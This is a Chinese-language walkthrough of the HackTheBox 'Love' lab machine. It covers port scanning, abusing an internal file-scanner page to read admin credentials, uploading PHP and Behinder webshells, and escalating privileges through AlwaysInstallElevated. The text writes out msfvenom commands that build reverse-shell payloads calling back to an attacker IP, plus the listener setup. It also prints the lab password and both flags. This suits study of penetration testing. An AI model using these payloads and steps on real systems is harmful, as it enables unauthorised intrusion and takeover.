【渗透测试】hackthebox靶场之Love

0x01信息收集

使用namp扫描端口

nmap -sV -sS -sC 10.10.10.239

发现还开放了不少的端口，80,135,139,443,445,3306,5000

通过nmap扫描到的相关信息，发现443端口绑定了staging.love.htb子域名并且403状态码，所以我们把IP地址和主域名子域名进行hosts文件进行解析，保证能通过域名能正常访问web服务

echo "10.10.10.239 staging.love.htb love.htb">> /etc/hosts

0x02 web渗透

我们先来访问一下主域名love.htb

发现是个登录页面，通过百度翻译voting system，好像是个投票选举系统，利用常见弱口令试了一下，登录失败。通过burp抓响应头扔进sqlmap发现注入失败。试试子域名staging.love.htb，发现也是一个登录的页面

点击一下demo，发现一个类似scan这种扫描文件的页面，随便输入一个127.0.0.1发现可以扫描到刚刚的登录窗口

不过目前还不知道怎么利用这个扫描。回到刚刚扫描的端口信息，发现5000端口也是属于HTTP的web服务，我们访问下5000端口

发现是403拒绝访问状态码，没有权限。外部访问无权限，如果是用这个扫描器自己内部访问不就有权限了？随即输入127.0.0.1:5000

发现扫描到了登录的账号admin和密码@LoveIsInTheAir!!!!

然后回到主域名love.htb，用账号密码登录发现没找到这个id，我在想是不是这个页面是迷惑我们的，然后试试加个/admin看下是不是有个管理员登录的页面，发现还真有

输入账号密码，登录成功！

在voters模块上发现有个文件上传的功能，这时候可以上传webshell

我们使用kali自带的webshell，在/usr/share/webshells/php/下找到php-reverse-shell.php。然后用编辑器修改下shell反弹回本机的ip地址和端口

然后上传后监听1234端口，发现报错

发现此系统无法找到指定的路径，然后看了下webshell发现，这个webshell是针对linux系统的，回到最开始的端口扫描信息，发现这个系统是windows的，我大意了。

所以，我们可以使用msf生成一个针对win系统的webshell（参考https://www.cnblogs.com/trevain/p/13675241.html）

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f raw > shell.php

生成php马后上传并用msf去接收shell反弹

use exploit/multi/handlerset payload php/meterpreter_reverse_tcpset lhost 10.10.14.2set lport 1234exploit

反弹成功，可是瞬间就反弹就挂了。让我们换个思路

既然linux系统不行，直接使用windows中的，，，冰蝎，，，真香（冰蝎能维持比较久时间）

获得user flag：

1cd157c43e7290d2382e472a13a0c267

0x03提升权限

关于windows提权并不是很熟，尝试开启3389端口发现无权限。只能百度搜一搜，发现知乎有位师傅有写本靶场的教程，看他写的提权是需要用到注册表，用他的方法试试。

当注册表中的alwaysinstallelevated设置为1时，机器上运行任何的msi程序，均会以system权限执行，我们只需生成一个msi的木马程序即可提权。

首先查看一下alwaysinstallelevated的设置

reg queryHKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstaller

reg queryHKLMSOFTWAREPoliciesMicrosoftWindowsInstaller

发现都是0x1，表示存在该漏洞

使用msfvenom生成一个msi的马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f msi >shell.msi

再用msf开启监听，然后把msi马上传上去，利用冰蝎的命令执行功能让他执行msi马（msiexec /quiet /qn /i shell.msi），从而进行msf反弹shell

获得root flag：

887d5a80e93759c98896d8141db2cf6b